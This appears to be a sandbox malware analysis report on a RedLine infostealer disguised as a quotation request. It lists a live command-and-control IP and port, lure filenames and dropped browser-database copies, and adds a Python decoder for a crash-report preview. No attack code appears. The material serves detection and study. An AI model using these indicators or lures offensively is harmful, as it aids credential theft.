http://tempuri.org/Endpoint/GetUpdates | [M6], [M3], [M2] | false | - | high
https://ac.ecosia.org/autocomplete?q= | [M7], [T] | false | - | high
https://api.ipify.orgcookies//settinString.Removeg | [M0], [M1] | false | - | high
http://schemas.xmlsoap.org/ws/2004/08/addressing | [M2] | false | - | high
http://tempuri.org/Endpoint/GetUpdatesResponse | [M2] | false | - | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | [M7], [T] | false | - | high
http://tempuri.org/Endpoint/EnvironmentSettingsResponse | [M2] | false | - | high
http://tempuri.org/Endpoint/VerifyUpdate | [M2] | false | - | high
http://193.70.111.186:13484pE | [M4] | false | Avira URL Cloud: safe | unknown
http://tempuri.org/0 | [M2] | false | - | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | [M2] | false | - | high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | [M7], [T] | false | - | high
http://schemas.xmlsoap.org/soap/actor/next | [M2] | false | - | high
IPs
IP | Domain | Country | ASN | ASN Name | Malicious
193.70.111.186 | unknown | France | 16276 | OVHFR | true
                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                          Analysis ID:1557873
                                                                                          Start date and time:2024-11-18 17:33:05 +01:00
                                                                                          Joe Sandbox product:CloudBasic
                                                                                          Overall analysis duration:0h 5m 32s
                                                                                          Hypervisor based Inspection enabled:false
                                                                                          Report type:full
                                                                                          Cookbook file name:default.jbs
                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:14
                                                                                          Number of new started drivers analysed:0
                                                                                          Number of existing processes analysed:0
                                                                                          Number of existing drivers analysed:0
                                                                                          Number of injected processes analysed:0
                                                                                          Technologies:
                                                                                          • HCA enabled
                                                                                          • EGA enabled
                                                                                          • AMSI enabled
                                                                                          Analysis Mode:default
                                                                                          Analysis stop reason:Timeout
                                                                                          Sample name:RFQ_TFS-1508-AL NASR ENGINEERING.exe
                                                                                          Detection:MAL
                                                                                          Classification:mal100.troj.spyw.expl.evad.winEXE@12/55@1/1
                                                                                          EGA Information:
                                                                                          • Successful, ratio: 50%
                                                                                          HCA Information:
                                                                                          • Successful, ratio: 80%
                                                                                          • Number of executed functions: 100
                                                                                          • Number of non-executed functions: 1
                                                                                          Cookbook Comments:
                                                                                          • Found application associated with file extension: .exe
                                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                          • Excluded IPs from analysis (whitelisted): 172.67.75.172, 104.26.13.31, 104.26.12.31, 20.42.65.92
                                                                                          • Excluded domains from analysis (whitelisted): api.ip.sb.cdn.cloudflare.net, onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                          • Execution Graph export aborted for target RFQ_TFS-1508-AL NASR ENGINEERING.exe, PID 5276 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                          • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                          • VT rate limit hit for: RFQ_TFS-1508-AL NASR ENGINEERING.exe
Time | Type | Description
11:33:59 | API Interceptor | 23x Sleep call for process: powershell.exe modified
11:34:09 | API Interceptor | 38x Sleep call for process: CasPol.exe modified
11:34:23 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
Context
IPs
Match | Associated Sample Name / URL | Detection | Threat Name | Context
193.70.111.186 | Preventivo#09678.exe | malicious | RedLine | 193.70.111.186:13484/
193.70.111.186 | QUOTATION#09678.exe | malicious | RedLine | 193.70.111.186:13484/
193.70.111.186 | RFQ_TFS-1508-AL NASR ENGINEERING.exe | malicious | RedLine | 193.70.111.186:13484/
193.70.111.186 | QUOTATION#09678.exe | malicious | RedLine | 193.70.111.186:13484/
193.70.111.186 | COTIZACI#U00d3N#09678.exe | malicious | RedLine | 193.70.111.186:13484/
Domains
No context
ASNs
Match | Associated Sample Name / URL | Detection | Threat Name | Context
OVHFR | https://t.co/D4HGMmKLnL | malicious | Unknown | 51.222.206.130
OVHFR | bPRQRIfbbq.exe | malicious | Unknown | 147.135.31.134
OVHFR | NfFibKKmiz.exe | malicious | Unknown | 54.36.99.69
OVHFR | 63w24wNW0d.exe | malicious | Unknown | 51.178.131.200
OVHFR | ajbKFgQ0Fl.exe | malicious | Unknown | 87.98.242.239
OVHFR | 63w24wNW0d.exe | malicious | Unknown | 94.23.150.210
OVHFR | I_ Ultima richiesta di pagamento finale per Cuzziol beverage s_r_l__.msg | malicious | Mint Stealer | 51.91.79.17
OVHFR | Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd | malicious | AgentTesla, DBatLoader, PureLog Stealer | 51.195.88.199
OVHFR | Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd | malicious | AgentTesla, DBatLoader, PureLog Stealer | 51.195.88.199
OVHFR | http://pumpfun.board-sol.com/ | malicious | Unknown | 51.75.198.221
JA3 Fingerprints
No context
Dropped Files
No context
                                                                                          Process:C:\Windows\System32\WerFault.exe
                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):65536
                                                                                          Entropy (8bit):1.2268748978522397
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:HS+Y6KFu0UnUlaWz3OlTwd/PPdzuiFwZ24lO8Wr:y+YvFVUnUla4ouHVzuiFwY4lO8W
                                                                                          MD5:B6F20C045459E542ED787E4662D91E3A
                                                                                          SHA1:D5A746AB8631F23DA0AA643AE827E645948AF301
                                                                                          SHA-256:37B1A32D70C83D359A6F1BB989471BEC13A260F94A8D4F1EC9B20CC0EB1A64FA
                                                                                          SHA-512:F0C3697576AE3EE804EE383FCCCE093096B2CCEBAE3E932128E93A94383283C2BBF3E576DC2354B16CA7DA8E914C2BF327E0BF446D4156330FD67AAA6F661C77
                                                                                          Malicious:false
                                                                                          Reputation:low
                                                                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.6.4.2.1.2.3.9.8.8.1.9.9.3.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.6.4.2.1.2.4.1.5.5.3.8.7.8.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.8.0.5.f.8.a.a.-.0.4.6.7.-.4.f.c.7.-.b.f.b.4.-.1.a.3.4.9.c.e.a.6.a.2.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.6.f.6.8.2.f.1.-.1.b.4.d.-.4.b.a.7.-.b.0.5.2.-.4.4.c.f.9.f.e.a.e.c.6.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.R.F.Q._.T.F.S.-.1.5.0.8.-.A.L. .N.A.S.R. .E.N.G.I.N.E.E.R.I.N.G...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.H.u.r.e.n.s.o.h.n...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.4.9.c.-.0.0.0.1.-.0.0.1.4.-.3.8.5.a.-.1.f.a.9.d.7.3.9.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.6.7.1.6.e.4.5.5.7.2.8.c.c.a.8.9.7.b.0.8.b.6.0.8.6.1.1.8.4.9.9.5.0.0.0.0.0.0.0.0.!.0.0.0.0.d.5.4.5.0.d.3.2.5.9.d.f.0.8.a.3.d.0.c.0.a.0.b.9.1.b.5.8.
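The Preview above is the WER Report.wer file rendered byte by byte: it is UTF-16LE text, so every character is followed by a null byte shown as ".", and the CR LF line ends show as "..". Read that way it says the crashing process was displayed as RFQ_TFS-1508-AL NASR ENGINEERING.exe but was compiled with OriginalFilename=Hurensohn.exe, and its TargetAppId carries a hash that begins with the submitted sample's SHA1. The decoder below is an added example, not Joe Sandbox's code or anything from the sample; its input is the preview string copied verbatim (truncated where the report truncates it), and two readings are assumptions of the example rather than statements of the report: that the hex run after "!0000" in TargetAppId is the file's SHA1 as WER records it, and that Wow64Host=34404 is the IMAGE_FILE_MACHINE value 0x8664 for an x64 host.

```python
import re

# Constructed input: the "Preview" field of the Report.wer dropped file, copied from
# the report and truncated at the same point.  Each byte is rendered as its ASCII
# character when printable and as "." otherwise, so the UTF-16LE line
# "Version=1\r\n" appears as "V.e.r.s.i.o.n.=.1.....".
WER_PREVIEW = (
    "..V.e.r.s.i.o.n.=.1....."
    "E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H....."
    "E.v.e.n.t.T.i.m.e.=.1.3.3.7.6.4.2.1.2.3.9.8.8.1.9.9.3.7....."
    "R.e.p.o.r.t.T.y.p.e.=.2....."
    "C.o.n.s.e.n.t.=.1....."
    "U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.6.4.2.1.2.4.1.5.5.3.8.7.8.7....."
    "R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4....."
    "R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.8.0.5.f.8.a.a.-.0.4.6.7.-.4.f.c.7.-.b.f.b.4.-.1.a.3.4.9.c.e.a.6.a.2.6....."
    "I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.6.f.6.8.2.f.1.-.1.b.4.d.-.4.b.a.7.-.b.0.5.2.-.4.4.c.f.9.f.e.a.e.c.6.8....."
    "W.o.w.6.4.H.o.s.t.=.3.4.4.0.4....."
    "N.s.A.p.p.N.a.m.e.=.R.F.Q._.T.F.S.-.1.5.0.8.-.A.L. .N.A.S.R. .E.N.G.I.N.E.E.R.I.N.G...e.x.e....."
    "O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.H.u.r.e.n.s.o.h.n...e.x.e....."
    "A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.4.9.c.-.0.0.0.1.-.0.0.1.4.-.3.8.5.a.-.1.f.a.9.d.7.3.9.d.b.0.1....."
    "T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.6.7.1.6.e.4.5.5.7.2.8.c.c.a.8.9.7.b.0.8.b.6.0.8.6.1.1.8.4.9.9.5.0.0.0.0.0.0.0.0.!.0.0.0.0.d.5.4.5.0.d.3.2.5.9.d.f.0.8.a.3.d.0.c.0.a.0.b.9.1.b.5.8."
)

# SHA1 of the submitted sample, taken from the report header.
SAMPLE_SHA1 = "d5450d3259df08a3d0c0a0b91b586e8532fab2e0"


def decode_utf16le_preview(preview: str) -> str:
    """Recover the text of a UTF-16LE preview whose non-printable bytes are shown as '.'.

    For ASCII content every odd byte of UTF-16LE is 0x00, so the characters sit at
    the even offsets; a '.' at an even offset is either a literal dot or a control
    byte (CR/LF).  The leading ".." is the FF FE byte-order mark and is dropped.
    """
    body = preview[2:] if preview.startswith("..") else preview
    return body[0::2]


# CR LF decodes to "..", but only a ".." that is followed by the next Key= ends a
# record, so a literal dot inside a value (Hurensohn.exe) survives.
_RECORD_SPLIT = re.compile(r"\.\.(?=[A-Za-z0-9_]+=)")


def parse_wer_preview(preview: str) -> dict:
    """Parse the Key=Value records of a Report.wer preview into a dict.

    The final record is whatever the preview was cut at, so its value may be partial.
    """
    fields = {}
    for record in _RECORD_SPLIT.split(decode_utf16le_preview(preview)):
        key, sep, value = record.partition("=")
        if sep:
            fields[key] = value
    return fields


# Assumption of this example: the hex run after "!0000" in TargetAppId is WER's SHA1
# of the crashed binary.  In a truncated preview only a prefix of it is available.
_TARGET_SHA1 = re.compile(r"!0000([0-9a-f]{1,40})")


def target_app_sha1_prefix(fields: dict) -> str:
    """Return the (possibly truncated) hash embedded in TargetAppId, or '' if absent."""
    m = _TARGET_SHA1.search(fields.get("TargetAppId", ""))
    return m.group(1) if m else ""


def crash_identity(fields: dict, sample_sha1: str) -> dict:
    """Pull out the lure name, the compiled-in name, the host architecture and whether
    the embedded hash prefix agrees with the submitted sample."""
    prefix = target_app_sha1_prefix(fields)
    return {
        "displayed_name": fields.get("NsAppName"),
        "original_filename": fields.get("OriginalFilename"),
        # Assumption: Wow64Host is an IMAGE_FILE_MACHINE value; 34404 == 0x8664 (AMD64).
        "x64_host": fields.get("Wow64Host") == "34404",
        "sha1_prefix": prefix,
        "sha1_matches_sample": bool(prefix) and sample_sha1.startswith(prefix),
    }


if __name__ == "__main__":
    print(crash_identity(parse_wer_preview(WER_PREVIEW), SAMPLE_SHA1))
```

The split-on-next-key rule is the one design choice worth noting: splitting on every ".." would be wrong for any value containing a literal dot, and splitting on "..\r\n" is impossible because the preview has already replaced the control bytes. On a full Report.wer file you would decode the bytes as UTF-16LE directly; the even-offset trick is only for the rendered preview.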
                                                                                          Process:C:\Windows\System32\WerFault.exe
                                                                                          File Type:Mini DuMP crash report, 16 streams, Mon Nov 18 16:34:00 2024, 0x1205a4 type
                                                                                          Category:dropped
                                                                                          Size (bytes):491999
                                                                                          Entropy (8bit):3.3111202052524322
                                                                                          Encrypted:false
                                                                                          SSDEEP:6144:GYpPNSfnQ4YWB8YtBq5Y3QgxHEvnB6t+:G2ctBq5MQgxHEvn
                                                                                          MD5:D10AC1C2B3295EC2945D20424F83F35F
                                                                                          SHA1:5AB46F133242AACD71ED775B6F5E2F1D76B1E00C
                                                                                          SHA-256:F0CFE847B6D799A6ECAB35517CA3CEF8BAA90D0613448D849BBDA8A8DDE173A5
                                                                                          SHA-512:C62F075186817129E47826CD5C319D2249F25A541F4DDDB18D556883B39BD9F888298B55284BAF3528FFAF7F3A4CF255BFFACF65BB58D993522A5C36CD8D3409
                                                                                          Malicious:false
                                                                                          Reputation:low
                                                                                          Preview:MDMP..a..... .......xl;g............t.......................$...H&..........l&.......O..b...........l.......8...........T............8...I..........\D..........HF..............................................................................eJ.......F......Lw......................T...........sl;g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Windows\System32\WerFault.exe
                                                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):8688
                                                                                          Entropy (8bit):3.7213208429869393
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:R6l7wVeJKnc6YEIOjhwgmf9h4Ppr389b+Hx1If2qm:R6lXJSc6YExjhwgmf9h4K+Hxafy
                                                                                          MD5:E4F96DA801C28EE80BFB6C1D1DB4820E
                                                                                          SHA1:396EA529E400DD4BBB4EC71C10692A2070287D41
                                                                                          SHA-256:30F303544F61B63FFBF18FB52520F5E3970F5F73BB6C95553FE0DC9E03E346F1
                                                                                          SHA-512:48003FA1B133220F55F21C3F104045B4C59685F690EDC5B31BAE5892AF055C405B2F415A238CF6354CD535DD276D7671FB6EFA240C48C55377CC173BC8AFB03A
                                                                                          Malicious:false
                                                                                          Reputation:low
                                                                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.2.7.6.<./.P.i.
                                                                                          Process:C:\Windows\System32\WerFault.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):4867
                                                                                          Entropy (8bit):4.608652788918635
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:cvIwWl8zsbJg771I9f4nWpW8VYlBYm8M4JM6sL+FUyq85wyssJvRwRad:uIjf1I74F7V3J68J5Wad
                                                                                          MD5:431D0F5AA385D60F65C9FC4392CCF50A
                                                                                          SHA1:2CA8071B3AB1D4DF60BBF99FFBF15E337A0690F7
                                                                                          SHA-256:CADDF717A855F7260DD534A3A2222C8143FBBA372CB844D367015DE6FF51F33C
                                                                                          SHA-512:FC93B80076DBC6447E9C4E672C0886AA672A6EA0111DF5AFBCE9AC9BC20EBA8E3D1409295F2C065A05B1C26681C8D01564687073C5A8D1536D336B40B0BEEA73
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="593736" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):2666
                                                                                          Entropy (8bit):5.345804351520589
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:MOfHK5HKxHKdHK8THaAHKzecYHKh3oPtHo6nmHKtXooBHKoHzHZHpHsLHG1qHjH4:vq5qxqdqolqztYqh3oPtI6mq7qoT5JMO
                                                                                          MD5:D0D47194D5B74E55C630347DE6A96230
                                                                                          SHA1:12AF0C6B683051AA403511EC84D3AA54207E27F1
                                                                                          SHA-256:4F2D52BD8198E047A17A76CEA912DEAEF331E91BF45DE94935967827B692E997
                                                                                          SHA-512:6A5080E7AEEF7E62ACB7D798B60D2F9D498D8D904A238318A0A985B7C62A4E71E1BE326AA3DDDCB961223A392F06C3E1DB5A46D519DDF48DBF5EB11C4096DF45
                                                                                          Malicious:false
                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.ServiceModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"SMDiagnostics, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\a3127677749631df61e96a8400ddcb87\System.Runtime.Serialization.ni.dll",0..2,"System.ServiceModel.Internals, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral,
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):64
                                                                                          Entropy (8bit):1.1940658735648508
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:NlllulVmdtZ:NllUM
                                                                                          MD5:013016A37665E1E37F0A3576A8EC8324
                                                                                          SHA1:260F55EC88E3C4D384658F3C18C7FDEF202E47DD
                                                                                          SHA-256:20C6A3C78E9B98F92B0F0AA8C338FF0BAC1312CBBFE5E65D4C940B828AC92FD8
                                                                                          SHA-512:99063E180730047A4408E3EF8ABBE1C53DEC1DF04469DFA98666308F60F8E35DEBF7E32066FE0DD1055E1181167061B3512EEE4FE72D0CD3D174E3378BA62ED8
                                                                                          Malicious:false
                                                                                          Preview:@...e................................................@..........
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.136413900497188
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                          MD5:429F49156428FD53EB06FC82088FD324
                                                                                          SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                          SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                          SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.136413900497188
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                          MD5:429F49156428FD53EB06FC82088FD324
                                                                                          SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                          SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                          SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                          Category:dropped
                                                                                          Size (bytes):196608
                                                                                          Entropy (8bit):1.121297215059106
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                          MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                          SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                          SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                          SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
